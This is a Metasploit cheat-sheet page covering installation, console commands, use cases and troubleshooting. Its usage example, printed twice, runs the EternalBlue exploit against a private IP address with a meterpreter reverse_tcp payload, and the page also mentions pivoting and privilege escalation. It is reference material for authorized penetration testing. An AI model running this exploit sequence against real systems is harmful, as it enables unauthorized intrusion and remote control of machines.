Metasploit

Penetration testing framework for exploit development, payload generation, and post-exploitation

Advanced Topics12 commands

#exploitation#framework#payload#ruby#post-exploitation

Installation

1Install via package manager (apt, brew)

2Use msfupdate for latest updates

3Build from source via GitHub

# Debian/Ubuntu
apt install metasploit-framework

# Or from source
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
bundle install

# Update existing install
msfupdate

Basic Usage

Start msfconsole, search for exploits, select a module, configure options, and execute

# Launch console
msfconsole

# Search for an exploit
search eternalblue

# Select a module
use exploit/windows/smb/ms17_010_eternalblue

# Show required options
show options

# Set target and payload
set RHOSTS 192.168.1.10
set PAYLOAD windows/x64/meterpreter/reverse_tcp

# Execute
run

Command Reference

12 commands

1Select a module by path

use

2Set a module option or payload

set

3Execute the selected module

run / exploit

4Search for modules by keyword

search

5Display options, payloads, targets, or advanced settings

show

6Display detailed module information

info

7Return to the previous context

back

8List, interact with, or kill active sessions

sessions

9Set a global option across all modules

setg

10Check if target is vulnerable without exploiting

check

11Reload all modules from disk

reload_all

12Add a route through a session for pivoting

route

When to Use

Exploiting known vulnerabilities in target services

Generating custom payloads for various platforms

Post-exploitation reconnaissance and privilege escalation

Pivoting through compromised hosts to reach internal networks

Validating security controls and vulnerability findings

Notes & Tips

Always obtain proper legal authorization before testing

Use resource scripts (.rc) to automate repetitive tasks

Keep framework updated with msfupdate for latest exploits

Meterpreter payloads provide extensive post-exploitation capabilities

Common Errors & Solutions

Exploit failed: connection refused

Verify the target service is running and the port is correct

No matching payload

Run show payloads and use a compatible payload for the target OS/arch

Database connection failed

Start the PostgreSQL service and run msfdb init

# Debian/Ubuntu apt install metasploit-framework # Or from source git clone https://github.com/rapid7/metasploit-framework.git cd metasploit-framework bundle install # Update existing install msfupdate

# Launch console msfconsole # Search for an exploit search eternalblue # Select a module use exploit/windows/smb/ms17_010_eternalblue # Show required options show options # Set target and payload set RHOSTS 192.168.1.10 set PAYLOAD windows/x64/meterpreter/reverse_tcp # Execute run